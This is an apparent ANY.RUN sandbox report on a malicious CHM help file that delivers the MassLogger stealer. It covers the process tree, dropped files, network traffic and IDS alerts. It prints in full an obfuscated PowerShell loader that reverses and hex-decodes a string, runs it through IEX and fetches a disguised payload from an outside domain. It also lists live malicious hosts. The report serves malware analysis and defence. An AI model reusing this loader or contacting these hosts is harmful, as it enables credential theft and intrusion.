File name: doc.chm
Full analysis: https://app.any.run/tasks/61a8f81c-2c67-4615-b690-2b17b064191c
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software intended to gain unauthorized access to users' information and transfer it to the attacker. The stealer category includes various programs that each focus on a particular kind of data, such as files, passwords, and cryptocurrency. Stealers can also spy on their targets by recording keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Analysis date: October 20, 2020, 06:09:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags: evasion, trojan, masslogger, stealer
Indicators:
MIME: application/octet-stream
File info: MS Windows HtmlHelp Data
MD5: 301D4B2815D8EEB2A8BA5668A269D2BF
SHA1: F0967158669AC3BB751F040064A5BBCD4BF5013F
SHA256: A5E610B7CA55722AC964E6E589776A8304B2D3E532D2CE54FF50FEAEE89ADBC3
SSDEEP: 48:PZzgXA0BmQRlEFlErlEll5su816r1yHkLA45MwAWcYWcCav9YYDB8c7Z6WDJhx+K:PdwYp816r1DAZMcYFdV1DectbxuMlz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • MASSLOGGER was detected
      • RegAsm.exe (PID: 2548)
    • Actions look like stealing of personal data
      • RegAsm.exe (PID: 2548)
  • SUSPICIOUS
    • Reads the machine GUID from the registry
      • Powershell.exe (PID: 2932)
    • Creates files in the user directory
      • hh.exe (PID: 2180)
      • Powershell.exe (PID: 2932)
      • powershell.exe (PID: 996)
    • Executes PowerShell scripts
      • hh.exe (PID: 2180)
      • RegAsm.exe (PID: 2548)
    • Reads Internet Explorer settings
      • hh.exe (PID: 2180)
    • Checks supported languages
      • RegAsm.exe (PID: 2548)
    • Checks for external IP
      • RegAsm.exe (PID: 2548)
  • INFO
    • No info indicators.
No Malware configuration.

TRiD:
  .chi | Windows HELP Index (81)
  .chm | Windows HELP File (18.9)

EXIF (EXE):
  CHMVersion: 3
  LanguageCode: English (U.S.)
No data.
Screenshots: available in the full report.
Total processes: 43
Monitored processes: 4
Malicious processes: 3
Suspicious processes: 0

Behavior graph

start → hh.exe (no specs) → powershell.exe → regasm.exe (#MASSLOGGER) → powershell.exe (no specs)

Process information

PID: 2180
CMD: "C:\Windows\hh.exe" C:\Users\admin\Desktop\doc.chm
Path: C:\Windows\hh.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft® HTML Help Executable
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

2932"C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe" -WindowStyle Hidden Set-PSReadlineOption -HistorySaveStyle SaveNothing;$diyyJ='D4%C7%72%72%02%E6%96%F6%A6%D2%02%37%27%16%86%34%96%96%36%37%16%42%02%D3%76%E6%96%27%47%35%96%96%36%37%16%42%B3%D7%22%F5%42%87%03%22%D5%56%47%97%26%B5%D5%27%16%86%36%B5%B7%02%47%36%56%A6%26%F4%D2%86%36%16%54%27%F6%64%C7%02%72%32%72%02%47%96%C6%07%37%D2%02%67%D6%42%02%D3%37%27%16%86%34%96%96%36%37%16%42%B3%92%72%76%07%A6%E2%24%43%F2%27%76%E2%E6%F6%96%37%96%67%F6%47%07%F6%F2%F2%A3%07%47%47%86%72%C2%46%F6%86%47%56%D4%A3%A3%D5%56%07%97%45%C6%C6%16%34%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%C2%72%76%E6%96%27%47%35%46%16%F6%C6%E6%77%F6%44%72%C2%97%47%47%42%82%56%D6%16%E6%97%24%C6%C6%16%34%A3%A3%D5%E6%F6%96%47%36%16%27%56%47%E6%94%E2%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%B5%02%D3%67%D6%42%B3%92%72%36%96%37%16%24%C6%16%57%37%96%65%E2%47%66%F6%37%F6%27%36%96%D4%72%82%56%D6%16%E4%C6%16%96%47%27%16%05%86%47%96%75%46%16%F6%C4%A3%A3%D5%97%C6%26%D6%56%37%37%14%E2%E6%F6%96%47%36%56%C6%66%56%25%E2%D6%56%47%37%97%35%B5%02%D5%46%96%F6%67%B5%B3%D4%C7%72%92%47%E6%56%72%B2%72%96%C6%34%26%72%B2%72%56%75%E2%47%72%B2%72%56%E4%02%47%36%72%B2%72%56%A6%26%F4%72%B2%72%D2%77%56%E4%82%72%D3%97%47%47%42%B3%23%23%07%42%02%D3%02%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%A3%A3%D5%27%56%76%16%E6%16%D4%47%E6%96%F6%05%56%36%96%67%27%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%B3%92%23%73%03%33%02%C2%D5%56%07%97%45%C6%F6%36%F6%47%F6%27%05%97%47%96%27%57%36%56%35%E2%47%56%E4%E2%D6%56%47%37%97%35%B5%82%47%36%56%A6%26%F4%F6%45%A3%A3%D5%D6%57%E6%54%B5%02%D3%02%23%23%07%42%B3%92%76%E6%96%07%42%82%02%C6%96%47%E6%57%02%D7%47%56%96%57%15%D2%02%13%02%47%E6%57%F6%36%D2%02%D6%F6%36%E2%56%C6%76%F6%F6%76%02%07%D6%F6%36%D2%02%E6%F6%96%47%36%56%E6%E6%F6%36%D2%47%37%56%47%02%D3%02%76%E6%96%07%42%B7%02%F6%46%B3%56%E6%F6%26%45%42%02%D4%02%C6%16%37%B3%92%72%94%72%C2%72%E3%72%82%56%36%16%C6%07%56%27%E2%72%85%54%E3%72%D3%56%E6%
F6%26%45%42';$text =$diyyJ.ToCharArray();[Array]::Reverse($text);$tu=-join $text;$jm=$tu.Split('%') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
Path: C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Parent process: hh.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2548
CMD: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Parent process: Powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft .NET Assembly Registration Utility
Exit code: 0
Version: 4.7.3062.0 built by: NET472REL1

PID: 996
CMD: "powershell" Start-Sleep -Seconds 2; Remove-Item -path 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: RegAsm.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 813
Read events: 667
Write events: 0
Delete events: 0

Modification events: No data

Executable files: 0
Suspicious files: 3
Text files: 0
Unknown types: 1

Dropped files

PID | Process | Filename | Type
2180 | hh.exe | C:\Users\admin\AppData\Local\Temp\IMTF1D8.tmp | (no type recorded)
  MD5: (not recorded)
  SHA256: (not recorded)
2932 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TDU1X1495EG4O1VGQU4O.temp | (no type recorded)
  MD5: (not recorded)
  SHA256: (not recorded)
996 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\76QPLXIBPVYC4VFE4G6B.temp | (no type recorded)
  MD5: (not recorded)
  SHA256: (not recorded)
996 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
  MD5: 3B8C240DEE430BE8DF9B69C157CDFD7E
  SHA256: A891A7407FF50903818F57A766144C5BD6D6024A751F833A172D289AAE1CAF98
2932 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms | binary
  MD5: 12B7DCAA24D34D931DDB404D7F7F85B4
  SHA256: 7D3A643B7D80DEDE0AF1856BACC62F0FC11C43220AF9C270E20E498CE04DEA0C
2932 | Powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF19fc58.TMP | binary
  MD5: 12B7DCAA24D34D931DDB404D7F7F85B4
  SHA256: 7D3A643B7D80DEDE0AF1856BACC62F0FC11C43220AF9C270E20E498CE04DEA0C
2180 | hh.exe | C:\Users\admin\AppData\Roaming\Microsoft\HTML Help\hh.dat | chm
  MD5: 767C30488AAA3C9E86CF5D23A4635AFC
  SHA256: 2FE04388636D6D5A91BCF0E49ABD84454AE258E862E09C7CA2CDCC8488C397CC
HTTP(S) requests: 2
TCP/UDP connections: 4
DNS requests: 5
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
2932 | Powershell.exe | GET | 200 | 78.47.203.8:80 | http://optovision.gr/4B.jpg | DE | text | 2.59 Mb | unknown
2548 | RegAsm.exe | GET | 200 | 50.17.193.91:80 | http://api.ipify.org/ | US | text | 15 b | shared

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
2548 | RegAsm.exe | 5.189.152.112:21 | med-star.gr | Contabo GmbH | DE | malicious
2932 | Powershell.exe | 78.47.203.8:80 | optovision.gr | Hetzner Online GmbH | DE | unknown
2548 | RegAsm.exe | 50.17.193.91:80 | api.ipify.org | Amazon.com, Inc. | US | suspicious
 |  | 5.189.152.112:59331 | med-star.gr | Contabo GmbH | DE | malicious

DNS requests

Domain | IP | Reputation
google.com | 216.58.212.142 | whitelisted
optovision.gr | 78.47.203.8 | unknown
dns.msftncsi.com | 131.107.255.255 | shared
api.ipify.org | 50.17.193.91, 23.21.126.66, 23.21.109.69, 54.225.169.28, 54.235.98.120, 54.204.14.42, 54.225.66.103, 54.235.182.194 | shared
med-star.gr | 5.189.152.112 | malicious

Threats

PID | Process | Class | Message
2548 | RegAsm.exe | Misc activity | SUSPICIOUS [PTsecurity] External IP Lookup (possible MassLogger)
2548 | RegAsm.exe | Potential Corporate Privacy Violation | ET POLICY External IP Lookup api.ipify.org
2548 | RegAsm.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction

2 ETPRO signatures are available in the full report.
No debug info